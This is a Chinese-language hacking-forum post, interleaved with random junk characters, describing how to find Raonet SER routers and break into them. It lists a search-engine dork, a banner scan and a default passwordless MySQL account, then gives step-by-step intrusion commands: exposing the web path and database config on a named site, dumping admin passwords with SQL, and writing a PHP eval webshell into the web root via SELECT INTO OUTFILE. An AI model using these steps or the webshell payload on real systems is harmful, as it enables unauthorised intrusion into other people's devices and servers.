寻找存在漏洞的路由器方法:7 C% i) m# @* W* f9 f1 ]0 M
6 f* C4 K! v O/ L1 E% u) Y& j1:google搜索'Raonet Subscriber Ethernet Router'
8 T9 C; _ l% u( a. h% n& \" V) ?2 ^' [- e& e+ s3 S' ^, i5 s8 U7 g, k
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001( {# @% ~0 t1 D; `- S: [8 v
; L/ l5 [- l) ~7 |2 \5 R% g E" D2 [4 b
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。. |* n9 X9 d4 i8 z$ Z& X; Y# H
6 P) f G" D' C' R3 e2 I//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......% P2 j& g3 z8 R9 p4 l4 l8 C3 `% k
; D% I, t/ V& G# Z- s: Q
6 A- y& @+ P- Y) V9 j; \" j$ M7 T( S$ |+ a/ `7 i
入侵步骤:
2 }+ c" N( _* m2 {: ?) H) q: g8 y( [9 B7 y. O& L
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
3 r% M5 K* H* W" M- c7 R4 J0 n
5 }# ^6 O, z9 ~- B$ n* {) U2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc$ z ?6 H& s* L O
3:得到密码后连接,查看GUI管理密码:- R. D7 S# C# Z* q8 N6 K
use ser_500
, y! q/ b; p% _3 }) P1 G& Iselect id,passwd from user;" u3 T0 w6 e& N9 Q6 c$ }8 q
4:通过数据库写入webshell,执行命令:& @4 R( p( k. C, X/ A4 B
use mysql;- m# Q; o8 f* l" \' w
create table ok(cmd TEXT);, ^* z) B2 o9 t4 d+ V6 E
insert into ok values("<?php @eval($_POST[cmd])?>");5 R& A% R, V8 m
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";0 `9 v3 R9 E( F; C8 y) M9 ?
drop table ok;
9 E! k. P8 ~3 ]
! ]3 L# f# c1 E$ R8 ^0 c2 {! g( w5:连接后门shell.php : P) L3 J+ F% ]8 N4 t2 A$ g
8 U& F" o* }3 E6 B, R) q5 t) u( {6. 搞定!
4 { u' V3 p& `$ D! v/ x. z5 W* l" M
|